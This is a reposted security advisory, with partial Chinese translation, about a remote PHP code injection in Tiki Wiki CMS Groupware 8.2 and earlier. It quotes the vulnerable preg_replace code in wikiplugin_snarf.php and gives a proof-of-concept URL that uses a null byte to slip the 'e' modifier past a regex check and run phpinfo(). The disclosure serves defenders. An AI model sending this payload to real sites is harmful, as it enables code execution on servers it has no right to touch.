Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection

Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection
tiki 百科CMS 软件团队 小于等于8.2版本的(snarf_ajxa.php文件)存在远程PHP代码注入

The vulnerable code is located into /lib/wiki-plugins/wikiplugin_snarf.php:
这个漏洞代码在本地的/lib/wiki-plugins/wikiplu_snarf.php文件中的170-173行:

170.   // If the user specified a more specialized regex
171.   if ( isset($params['regex']) && isset($params['regexres']) && preg_match('/^(.)(.)+\1[^e]*$/', $params['regex']) ) {
172.      $snarf = preg_replace( $params['regex'], $params['regexres'], $snarf );
173.   }

input passed through $_REQUEST['regex'] is checked by a regular expression at line 171 to prevent
execution of arbitrary PHP code using the  'e'  modifier in a call to preg_replace() at line 172.
But  this  check  could  be  bypassed  with a  null byte injection,  requesting an URL like this:

http:///tiki-8.2/snarf_ajax.php?url=1®exres=phpinfo()®ex=//e%00/

Tiki internal filters remove  all null bytes  from user input,  but for some strange reason  this
doesn't  happen within admin sessions. So, successful exploitation of this vulnerability requires
an user account with  administration  rights and  'PluginSnarf'  to be enabled  (not by default).
想成功利用这个漏洞的请求administrator的权限和'PluginSnarf' 的开启。

本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://www.yesck.com/post/487/

本文 暂无 评论

回复给

欢迎点评

联系我们

站长QQ:8117829

站长邮件:8117829@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code